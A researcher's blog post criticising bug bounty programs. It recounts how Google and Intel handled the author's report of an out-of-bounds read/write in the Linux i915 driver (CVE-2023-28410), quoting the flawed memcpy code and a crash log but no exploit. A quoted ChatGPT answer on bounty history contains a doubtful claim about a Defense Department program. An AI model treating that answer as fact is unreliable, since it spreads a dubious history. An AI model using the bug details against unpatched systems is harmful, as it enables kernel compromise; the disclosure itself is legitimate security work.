At first, I didn’t plan to write an article about the problems with bug bounty programs. This was supposed to be a standard technical blogpost describing an interesting bug in the Linux Kernel i915 driver allowing for a linear Out-Of-Bound read and write access (CVE-2023-28410). Moreover, I’m not even into bug bounty programs, mostly because I don’t need to, since I consider myself lucky enough to have a satisfying, stable and well-paid job. That being said, in my spare time, apart from developing and maintaining the Linux Kernel Runtime Guard (LKRG) project, I still like doing vulnerability research and exploit development not only for my employer, and from time to time it’s good to update your resume with new CVE numbers. Before I started to have a stable income, bug bounties didn’t exist and most of the quality vulnerability research outcome was paying the bills via brokers (let’s leave aside the moral questions arising from this). However, nowadays we have bug bounty programs…

For the last decade (a bit longer), bug bounty programs gained a lot of deserved traction. There are security researchers who rely on bug bounties as their primary(!) source of income. Such cases are an irrefutable proof of the success of the bug bounty programs. However, before the industry ended up where it is now, it went through a long and interesting route.

A little bit of history:

On November 5, 1993, Scott Chasin created the bugtraq mailing list in response to the problems with CERT, where security researchers could publish vulnerabilities, regardless of vendor response, as part of the full disclosure movement of vulnerability disclosure. On July 9, 2002, Len Rose created Full Disclosure – a “lightly moderated” security mailing list because many people felt that the bugtraq mailing list had “changed for the worse”.
However, not everyone agreed with the “Full Disclosure” Philosophy and 2 major alternatives can be summarized as a Non-Disclosure and Coordinated Disclosure (also known as “Responsible Disclosure”). Non-Disclosure is generally favored by blackhat hackers and later by commercial exploit vendors (including brokers).

Coordinated (responsible) vulnerability disclosure is a policy under which researchers agree to report vulnerabilities to a coordinating authority, which then reports it to the vendor, tracks the fixes and mitigations, and coordinates the disclosure of information with stakeholders including the public. In some cases, the coordinating authority is the vendor.
However, some researchers started to raise concerns about how vendors handle the reported vulnerabilities (and treat the researchers as enemies) while others started to have expectations of compensation for their reports (bug bounty-like programs).

“No more free bugs”

In March 2009 at CanSecWest conference, Alex Sotirov, Dino Dai Zovi and Charlie Miller announced the “No More Free Bugs” campaign spreading the word that, in most cases, they would no longer be providing vendors with free vulnerability notices. Regardless of how effective it was (not really: https://twitter.com/0xcharlie/status/1480593646756024323), it certainly made industry news and opened a broader debate about the problem. It is worth mentioning that in the old days, when security researchers got a free t-shirt for their work, they could consider themselves lucky 😉 The real rewards came in fame and job offers from third parties (if at all).

The reason I’m mentioning all these “past problems” is because they are the basis of how and why we have bug bounty programs today in some form or other. Moreover, certainly we would NOT want to find the industry in a similar shape as in the old days.

Bug bounty programs – A new wonderful world!

Let’s ask ChatGPT the following question:

  • “What is the history of bug bounty programs?”
  • “Bug bounty programs have their origins in the early days of the internet, with companies such as Netscape and Mozilla offering rewards for the discovery and reporting of security vulnerabilities in their software. The concept of a “bug bounty” was formalized by the United States Department of Defense in the early 2000s with the launch of the Vulnerability Reward Program (VRP). Since then, many technology companies and organizations have implemented similar programs, offering rewards to security researchers for finding and reporting vulnerabilities in their systems. These programs have become an important tool in the fight against cybercrime, as they incentivize individuals to find and report vulnerabilities before they can be exploited by malicious actors.”

Pretty accurate 😉 While the market for vulnerabilities has developed, vulnerability commercialization (or “bug bounties”) remains an important tool allowing the developers to discover and resolve bugs before the general public becomes aware of them, preventing incidents of widespread abuse and data breaches.

However, some people might ask “Why do companies bother creating a bug bounty program?”. It’s a fair question, what’s the point (from the companies’ perspective) of paying money to “random” people for finding bugs in their products? Bug bounties benefit not only the researchers. In fact, if company’s security is mature enough and their products development is security oriented (which is usually not the case) they can actually bring a lot of benefits, including:

  • Cost-effective vulnerability management – bug bounties can be more cost-effective than hiring a third-party security firm to conduct penetration testing or vulnerability assessments, which can be expensive (especially for very complicated and mature products). Additionally, with a bug bounty program, companies can expand their testing and vulnerability research coverage, as they can have many security researchers with different levels of expertise, experience, and skills testing their products and systems. This can help the company to find vulnerabilities that might have been missed by their internal team.
  • Brand reputation – by having a bug bounty program, companies can show that they care about security and are willing to invest in it. It can also help to improve the company’s reputation in the security industry.
  • “Protect” the brand – by opening a bug bounty program, companies can encourage researchers to report vulnerabilities directly to them, rather than publicizing them or selling them to malicious actors. This can help to mitigate various security risks.
  • “Advertisement” to the potential customers – bug bounty are showing that they take security seriously and are actively working to identify and address vulnerabilities. Companies can build trust with their customers, partners, and other stakeholders.

Nevertheless, it should be noted that having a bug bounty program does not replace the need for secure SDLC, regular security testing and vulnerability management practices, and more. It’s an additional layer of security that can complement the existing security measures in place.

“Bug bounties are broken”

As we can see, bug bounties are very successful because both parties – researchers and companies – benefit from them. However, that being said, in recent years more and more security researchers started to loudly complain about some specific bounty programs. A few years ago, given the success of the bug bounties, such unfavorable opinions were marginal. Of course, they have always been there but certainly they were not as visible. Whenever a new company joined the revolution of opening a bug bounty, they were praised (especially by the media) for being mature and understanding the importance of security problems instead of pretending that security problems don’t affect them. However, has any media article really analyzed how such programs work in detail? Are there really no traps hidden for researchers in the conditions of the program?

Unfortunately, it seems as if every month social media (twitter?) discusses cases of, to put it mildly, controversial activities of some companies around their bug bounty programs. Is the golden age of bug bounty over? Perhaps little has changed other than more researchers starting to rely on the bug bounties as a primary (or significant) source of their income. Naturally, problems with the bug bounties would significantly affect their life and cause them to raise their concerns more broadly/boldly.

Bug bounties (as well as any type of vulnerability reporting program) always involved risk for the researchers. Some of the main reasons (again, thanks to ChatGPT! :)) include:

  1. Insufficient rewards – some researchers may feel that the rewards offered by bug bounty programs are insufficient, either in terms of the monetary value or the recognition they receive. This can be especially true for researchers who discover high-severity vulnerabilities, which may be more difficult or time-consuming to find.
  2. Slow or unresponsive communication – researchers may be frustrated by slow or unresponsive communication from bug bounty program coordinators, especially when it comes to triaging and addressing reported vulnerabilities.
  3. Lack of transparency – researchers may feel that there is a lack of transparency in how bug bounty programs are run and how rewards are determined. They may also feel that there is a lack of communication about which vulnerabilities are being fixed and when.
  4. Unclear scope – researchers may feel that the scope of the bug bounty program is not clearly defined, making it difficult for them to know which vulnerabilities are in scope and which are not.
  5. Duplicate reports – researchers may feel frustrated when they report a vulnerability and then find out that it has already been reported by someone else. This can be especially frustrating if they are not rewarded for their work.
  6. Rejecting a report – researchers may feel that their report is rejected without clear explanation, or that their report is not considered as a vulnerability.
  7. No public recognition – some researchers may want to be publicly recognized for their work and not just rewarded with money.

As you can imagine, every single case from that list is happening to some extent. However, the fair question to ask is “what’s the main reason behind the possibilities of such problems?”.

“Imbalance of Power”

The fundamental problem with bug bounties is that they are not only created by the companies/vendors, but they are entirely and arbitrarily defined by them, and security researchers are at their mercy, without any recourse (because to whom can you appeal? to those who created, defined and decided what to do with the reported work?). We do have a problem with the power imbalance.
In the ideal world, we would have equitable terms that both parties can agree on, on what is to be expected under what circumstances before a security researcher even starts the work. Bug bounties are simply not structured this way.
Moreover, there’s a lot of false and misleading advertising, e.g., all of these articles showing the million dollar bug hunters, giving the impression that YOU too can become rich when you do bug bounties. A lot of young and motivated people, sometimes living in completely different countries than the company, have little options to fight for their rights when they are wronged. They might not know their legal rights, or don’t have the experience and capital to do that. However, some of the people in such situation try to fight by putting the pressure on the company using social media and we can see that from time-to-time e.g., on twitter.

Let’s look at some of the random examples of the problems with bug bounty programs that researchers had to deal with (you can find multiple ones):

1) “Rejecting a report”, “Slow or unresponsive communication”, “Unclear scope”, “Lack of transparency”, “No public recognition”, and after appeal “Insufficient rewards” from the researcher’s perspective:

“Windows 10 RCE: The exploit is in the link” (December 7th, 2021)

Quote from the researchers’ blogpost:

"Microsoft Bug Bounty Program's (MSRC) response was poor: Initially, they misjudged and dismissed the issue entirely. After our appeal, the issue was classified as "Critical, RCE", but only 10% of the bounty advertised for its classification was awarded ($5k vs $50k). The patch they came up with after 5 months failed to properly address the underlying argument injection (which is currently also still present on Windows 11)"

In that specific case, researchers “hit” 6(!) out of 7 general potential problems with bug bounties (almost a jackpot! :)). It is very fascinating and educational to read the entire section on communication with Microsoft (highly recommended). What is worth to point out, is that:

"Someone at MS must agree with us, because the report earned us 180 Researcher Recognition Program points, a number which we could only explain as 60 base points with the 3X bonus multiplier for 'eligible attack scenarios' applied."

2) “Unclear scope” which resulted in “Insufficient rewards” from the researcher’s perspective

A researcher found a bug in the DirectX virtualization feature which allowed him to escape the VM boundary. However, DirectX is not a part of Hyper-V itself but a separate feature which can be used by Hyper-V to provide certain functionality. DirectX is off by default unless certain features opt to turn it on. However, the researcher argued that this specific feature is on by default on WSL2 as well as some cloud providers which provide DirectX virtualization (for some scenarios).

That’s an interesting case from the scoping perspective because at the end of the day, the researcher developed a PoC and proved it could escape the VM boundary. Regardless of whether the problem is in core a Hyper-V component or not, such bugs are valuable in the black market and one of the brokers suggested to contact them next time instead of the bug bounty program:

3) “Unclear scope” and “Rejecting a report”

https://medium.com/@wlymoyi/how-i-find-microsoft-sever-rce-issues-they-fixed-but-didnt-pay-any-bounty-43a66e1aa002

A researcher found a few instances of Microsoft Exchange servers whose IP/Domains belong to Microsoft and they were vulnerable to the ProxyShell attack. ProxyShell is an attack chain that exploits three known vulnerabilities in Microsoft Exchange: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. By exploiting these vulnerabilities, attackers can perform remote code execution.

The researcher reported these issues to MSRC and after about 1 month Microsoft fixed all the issues and sent the researcher negative messages, claiming that all the issues are: Out of scope, and/or have only a moderate severity. The researcher argued that by combining all these issues you would get RCE in the end and RCE is certainly not a moderate issue (especially that Microsoft fixed the reported problems).

4) “Duplicate reports” and “Slow or unresponsive communication”

https://twitter.com/matrosov/status/1615815047653265410

A researcher submitted multiple high-impact vulnerabilities and months later the vendor rejected all the bugs arguing that they had known about them because they had discovered exactly the same bugs internally prior to the submission. However, at the same time the vendor didn’t and couldn’t provide any evidence (no CVEs) that they really found them by themselves (internally). Moreover, the vendor took a long time to respond which raises questions (and undermines credibility) about the internal findings.

5) “Insufficient rewards”

“Researcher drops Lexmark RCE zero-day rather than sell vuln “for peanuts””
https://portswigger.net/daily-swig/researcher-drops-lexmark-rce-zero-day-rather-than-sell-vuln-for-peanuts

Quote from the article:

According to the researcher, Lexmark was not notified before the zero-day's release for two reasons.
First, Geissler wished to highlight how the Pwn2Own contest is "broken" in some regards, as shown when low monetary rewards are offered for "something with a potentially big impact" such as an exploit chain that can compromise over 100 printer models.
Furthermore, he said that official disclosure processes are often long-winded and arduous.
"In my experience, patching efforts by the vendor are greatly accelerated by publishing turnkey solutions in the public domain without any heads up whatsoever," Geissler noted.
"Lexmark might reconsider partnering with similar competitions in the future and opt to launch their own vulnerability bounty/reward program."

“Linux Kernel i915 Linear Out-Of-Bound read and write access”

So, what’s the story of i915 driver vulnerability from the title of this article? Sometimes, when I really need a break from my day-to-day work and I’m burnt out working on LKRG, but at the same time I still want to do vulnerability research (I’m rarely in such state), I’m either reading (for fun) the source code of OpenSSH (which resulted in e.g., CVE-2019-16905 or CVE-2011-5000) or the Linux kernel:
https://sourcegraph.com/search?q=context:global+repo:%5Egithub%5C.com/torvalds/linux%24+type:commit+zabrocki&patternType=standard&sm=1&groupBy=path
https://github.com/torvalds/linux/search?q=zabrocki&type=commits

In November 2021 during analysis of i915 driver I found a linear Out-Of-Bound (OOB) read and write access causing a memory corruption and/or memory leak bug. The vulnerability exists in the ‘vm_access‘ function, typically used for debugging the processes. This function is needed only for VM_IO | VM_PFNMAP VMAs:

static int
vm_access(struct vm_area_struct *area, unsigned long addr,
void *buf, int len, int write)
{
…
if (write) {
[1] memcpy(vaddr + addr, buf, len);
__i915_gem_object_flush_map(obj, addr, len);
} else {
[2] memcpy(buf, vaddr + addr, len);
}
…
}

Parameter ‘len‘ is never verified and it is directly used as an argument for the memcpy() function. At line [1], the memcpy() function writes the user controlled data to the “pinned” page causing a potential memory corruption / overflow vulnerability. At line [2], the memcpy() function reads the memory (data) from the “pinned” page to the area visible to the user causing a potential memory leak problem.
The full and detailed description of the bug with all the analysis (and PoC) can be found here:
http://site.pi3.com.pl/adv/CVE-2023-28410_i915.txt

I’ve identified 3 different interfaces which could be used to trigger the bug and I shared my finding with my friend Jared (https://twitter.com/jsc29a) and we started working on PoC. We quickly developed a very reliable PoC crashing the kernel:

[ 2706.589001] BUG: unable to handle page fault for address: ffffb23ac04fa000
[ 2706.589011] #PF: supervisor read access in kernel mode
[ 2706.589016] #PF: error_code(0x0000) - not-present page

[ 2706.589140] Call Trace:
[ 2706.589264] ? vm_access+0x75/0xc0 [i915]

At that point I usually decide to develop a fully weaponized exploit, or to contact the vendor ASAP to report and fix the issue. However, just by my curiosity I wanted to know where Intel’s GPU (with i915 driver) is enabled (by default) and I realized that it is used in multiple interesting places, including:

  1. Google Chromebook / Chromium
  2. Most of the business laptops
  3. Power-efficient laptops
  4. Any device using Intel CPU with integrated GPUs

but hold on… doesn’t point “a.” (Chromebook) have a bug bounty program? Maybe it’s a good time to try bug bounties myself? How does it even work? Everyone praises Google and their Security, right?

So, let’s see what’s going on here:
https://bughunters.google.com/about/rules/5745167867576320/chrome-vulnerability-reward-program-rules

“…
In addition to the Chrome bug classes recognized by the program, we are interested in reports that demonstrate vulnerabilities in Chrome OS’ hardware, firmware, and OS components.

Sandbox escapes
Additional components are in scope for sandbox escapes reports on Chrome OS. These include:

Obtaining code execution in kernel context.
…”

OK, looks like it should be in scope of their bug bounty. Let’s try that path and see how it goes 🙂 I didn’t have much time to spend on this bug anymore, but I slightly modified the PoC to leak something (not just crashing the kernel). It was relatively easy, so I opened the bug and waited to see where it goes:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640

Then on Saturday (Feb 5th, 2022) I had some extra free time and decided to see how easy it would be to weaponize the PoC, and I realized something not so great 🙂
When I developed my PoC leaking something interesting, I did it on my debugging machine with a special configuration including KASAN and all of that. To my surprise, when I re-run my PoC on a “fresh and clean” VM, I was constantly crashing the kernel and did not leak anything. Well… that started bothering me so I spent some time analyzing what was going on. After heavy work and technical discussion with spender (kudos to grsecurity) I realized that when you enable PFN remapping (for debugging some of my peripheral) with KASAN, VM_NO_GUARD flag is set. When KASAN is NOT enabled, unfortunately, vmap() and vmap_pfn() place GUARD page on the top of the mapping in exactly the same way as vmalloc() adds a GUARD page on the top of each allocation 🙁 Because of that, my PoC was working very well on my debugging kernel but not on a “fresh” VM. Well… I thought I should update the bug which I opened to be fair and transparent, and I shared all the information (including updating the technical details in advisory and adding snipped relevant kernel code):
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c3

At that point I kind of expected that Chromebook configuration doesn’t enable KASAN on production (why would they? :)) so even though the bug is great by itself, it will only allow to crash the kernel (no code-exec, unless KASAN is enabled ;-)). However, the bug should be fixed anyway (even if it is kernel DoS) and because of non-standard configurations (with VM_NO_GUARD flag) it is exploitable. Google summarized the bug (based on what I shared) as:

“Thanks for the detailed report! Has this also been reported against upstream Linux and/or to the driver maintainers?

Here is a summary according to my understanding:

  • i915 GPU buffers can be accessed via vm_remote_access (intended for debugging buffers no residing in the userspace process’ address space)
  • The function that performs the memory access is lacking a length check, allowing userspace to attempt OOB read/writes past the buffer end
  • The standard kernel configuration has guard pages in place, which causes an access violation in the kernel, not an actual OOB access

Assuming the above is correct, this is a denial of service situation (since we reliably crash accessing the guard page), thus Severity-Low. We still want this fixed, but waiting for upstream to fix and then consuming the fix via stable branches is sufficient.”

Additionally, they confirmed that PoC crashes all the kernels. I didn’t really agree with the statement “(…) causes an access violation in the kernel, not an actual OOB access” because it is the other way around. It IS actual OOB access and because of that it causes access violation. However, I decided not to be picky and I ignored it. I confirmed their statement, Google assigned the severity “low” to it and informed me that they would forward all the information to Intel PSIRT… Sure 🙂 Now the “fun” part starts…

  • I reported the issue to Google on February 3rd, 2022
  • Google reported the issue to Intel on February 8th, 2022
  • Google went silent for 58 days
  • On 7th of April 2022, I asked if there were any updates
  • Silence for another 5-6 days

On April 12th, 2022 I was doing some LKRG development for the latest vanilla kernel and during git sync I realized that i915 kernel file where I found the bug was updated. Hm… It is “suspicious” to start seeing such “random” updates on that file while not getting any updates from Google for almost 2 months Let’s see what’s going on… and what I found completely shocked me 🙂

In summary, Google stayed silent for 58 days, they didn’t reply to my messages and in the meantime Intel fixed the bug more than a month prior, suggesting they found the bug themselves. However, as a consolation prize they put me as an author of the patch, using my old Microsoft address (while I haven’t worked for Microsoft since 2019 as I mentioned before). So far, bug bounty programs are doing great! 🙂

It looks like I hit the following problems so far:

  • “Slow or unresponsive communication” – in fact, I would elevate it to no communication at all
  • “Lack of transparency” – how bug ended-up being fixed and no one gave any updates for almost 2 months
  • “No public recognition” – the fixes suggest that the bug was found internally by Intel

I wrote about all my findings to Google, after which they finally replied saying that they didn’t contact Intel nor did Intel contact them. Google has taken responsibility to be the coordinator of handling the bug reporting/fixing process but didn’t follow-up on what was going on for 2 months.

On the top of the listed potential problems with Bug Bounty programs, a “middle-man” like Google might deserve their own list of unique problems. However, at the same time, the described problems can fall into the bracket of “Slow or unresponsive communication” and “Lack of transparency”.

Going back to the main story, Google added me to the mailthread and went silent again. In the meantime, I started talking with Intel directly, and on April 12th they promised to come back to me until EOW after finding out what was going on. I reminded them on April 14th about it and they still were silent. Then I poked them again on the 18th because of course I didn’t hear back from them at the end of the week (“Slow or unresponsive communication” and “Lack of transparency”). Then I got a reply which was kind of… weird?

“I appreciate your patience with this. The issue has received a positive triage and was reproducible. We are currently working with the product team to settle on a severity score and a push to mitigation.(…)”

This reply didn’t make sense because during the time of the conversation, Intel already created a patch for this issue (on March 3, 2022, 6:04 a.m.) and merged it to the official Linux kernel on March 14th, 2022. In short, the bug was already fixed, pushed to the Linux git repo making it essentially public for the last 40+ days. Despite this, no CVE had been assigned and the security bulletin has not been published. However, Intel was claiming that they were still triaging the issue…

I also didn’t get why I had to start resolving the issues which I didn’t create. This bug was officially reported to Google, and I would expect that Google’s responsibility is to handle the communication and fixes correctly. I asked Google about that and the reply which I got was a long corporation statement which in short was saying something around “It’s Intel’s problem, not ours. We are OK, the severity is low so what’s your problem?”
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Well… I do understand and I’m fully aligned and agree that it is the responsibility of the component’s owner (Intel in this case) to handle any fixes. Although, I would question if such kind of communication is an industry standard as there’s been no follow-up with the researcher (February – April) as well as no follow-up with the vendor throughout.
When I asked for updates, I received no reply until I discovered by myself that the bug had been already fixed in a shady way for at least a month.

In short, Google’s reply can be summarized as “It’s Intel’s problem and now they are doing OK, they are not shady”:
https://bugs.chromium.org/p/chromium/issues/detail?id=1293640#c22

Google’s approach might fall into something equivalent as “Unclear scope” brackets of problems but unique for a “middle-man”. It is an actual Google’s responsibility as a coordinator for handling the bugs reported to them.

Additionally, I got a pretty interesting statement:

“We are all humans running and crewing security programs trying to triage our own discoveries as well as those from external reporters and trying to run decent VDP programs. All the folks I work with in Chrome/Chrome OS greatly appreciate the contributions of the external researchers – such as yourself- are trying their best to get bugs fixed and want to do the right thing. There are smart people and solid processes to stay on top of all this, but at the end of the day mistakes are going to happen – bugs may get mistriaged, reports may get merged in the wrong direction giving someone else the acknowledgement for a finding, someone may not always respond in a timely manner. But 100% of the time, if you reach out, one of us will respond, hear you out and work with you to make things as right as possible.
From what I can see in the comments above and in the email thread, each time you reached out to mnissler@, he responded fairly quickly. He could only do so much to get you the information you wanted because we are on the outside of that process. He did go and attempt to coordinate with Intel as best as possible and to eliminate the need for the middle-person to run comms, added you on the email thread so you could directly coordinate with the vendor/Intel.”

Behind all these sweet words, what is really written is “well, shit happens, deal with it, not our problem”. Moreover, there is lack of any explanation of what really happened here (serious “Lack of transparency”).
In fact, there is nothing in what she wrote that I would disagree with, excluding “always respond in a timely manner” (please look at the dates at comment 14, 15, 16 and 17). Almost 2 months of no reply and follow-up, that’s certainly not a “timely manner response” (“Slow or unresponsive communication”).
What is the most crazy is that from Google’s perspective everything was done as it should be, including communication. I’m surprised by it, and I would respectfully disagree with that.
If during this time (February – April 2022) anyone had followed-up with the vendor and sent even a single email asking for the updates, this mess could have been avoided.

How has it ended?

Intel continued “triaging the bug” until October 2022 (!). They kept postponing the release date from October to November, then to February 2023… and then to May 2023 (remember that bug was reported in February 2022, silently fixed as an internal finding on March 2022, and was originally found by me in November 2021 :)).

Bulletin:
INTEL-SA-00886 / CVE-2023-28410:

Lesson learned

My experience with bug bounties was much worse than I expected. Especially Google’s attitude of being silent forever until things went horribly/obviously wrong. Then, they tried to put the responsibility for everything on Intel and convince me that it was not their problem even though the bug was reported to them, and that they were handling the communication very well(!). As a researcher, what can you do? Nothing.
Intel screwed up badly, but they tried best to fix what they messed-up (and what was still possible to fix at that point). Contrary to Google’s attitude, Intel didn’t blame anyone, and they didn’t try to convince me that they were doing their best and they were not dismissive.

It is worth mentioning that Intel officially apologized for how this case was handled: “(…) We would like to apologize for the way this case has been handled. We understand the back and forth with us has been frustrating and a long process. (…)“. However, nothing like that happened on Google’s part.

If this bug was really valuable from the exploitability perspective, it looks like still the best option is to dust off the old broker contacts (if we leave the moral questions aside). They never ever failed so much (at least that’s my experience), even though they are not ideal as well.

Btw. To be fair, there are also positive examples of bug bounty programs, like this one:
https://twitter.com/ergot86/status/1618977435898494976

Closing words

The decision of whether or not to write this article has matured in me for quite a long time for many different reasons. However, when I came to the conclusion that it is worth describing the generally unspoken problems associated with bug bounty programs (including my specific case), the following people contributed to its final form (random order):

I hope that we as a security community can start some conversation on how the described unspoken problems of bug bounties can be addressed. “Imbalance of Power” is a real problem for the researchers and it should be changed.

Thanks,
Adam

Comments

  1. reader on 05.17.2023

    Seems that you have the same kind of experience as many other bug hunters. I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist. For every one of these stories, there are thousands of other bug bounty reports that get communicated, resolved, and rewarded on time and with happy people on all sides.

    What are your personal statistics regarding positive, neutral, and negative experience reports?

  2. Niccolo Belli on 05.19.2023

    > I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist

    It doesn’t have to. Instead of the stupid liability rules which will harm Free Software the EU could regulate bounty programs and even create an independent arbitrage.

  3. Maulik Mistry on 05.19.2023

    This may have had a broken my heart through this experience after other experiences I’ve gone through. I appreciate you writing it through and standing up because it allows me to see an example in our industries cut through language and limit an ingress into your worthwhile efforts or being worthwhile. Thank you.

    I relate an unrelated issue where it doesn’t seem we have a proper teamwork in handling bugs until enough people can post a problem to draw significance matching the similarity of the things you note. Android 13 seems to have a broken Bluetooth stack but there is little understanding of how the process is going to get this through a system of resolution or unnecessary while medical devices lose connection. It is marked as a fixed status but there isn’t even a comment of where or how at. . .
    Android 13: Unable to reconnect reliably to bonded peripheral https://issuetracker.google.com/242755161

  4. observer on 05.20.2023

    It seems to me the researcher has the power, but forfeits it by giving the bug details to the vendor before agreeing on compensation. The researcher should publicly demonstrate the exploit (e.g. via screen recording) to show how severe the issue is, but without revealing the details of the vulnerability. Then negotiate with the vendor for a bug bounty price before disclosing the details to the vendor.

  5. Giacomo Pagina on 05.25.2023

    > I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist

    TBH that sounds like a dead end to me. Every time govs are involved in something, they never deliver improved tools, frameworks, or processes. Actually, bureaucracy always gets stuff muddy.

    There are many companies already acting this way, like hackerone.com (@Niccolo: even a platform that is currently under development in Martinsicuro! xD).

    I’d like to know the author’s feedback on these bug bounty solutions.

  6. Giacomo Pagina on 05.25.2023

    > > I wonder though if the claimed “imbalance of power” is really just an unfortunate situation which will always exist
    >
    > It doesn’t have to. Instead of the stupid liability rules which will harm Free Software the EU could regulate bounty programs and even create an independent arbitrage.

    TBH that sounds like a dead end to me. Every time govs are involved in something, they never deliver improved tools, frameworks, or processes. Actually, bureaucracy always gets stuff muddy.

    There are many companies already acting this way, like hackerone.com (@Niccolo: even a platform that is currently under development in Martinsicuro! xD).

    I’d like to know the author’s feedback on these bug bounty solutions.

Leave a Reply




CAPTCHA * Time limit is exhausted. Please reload the CAPTCHA.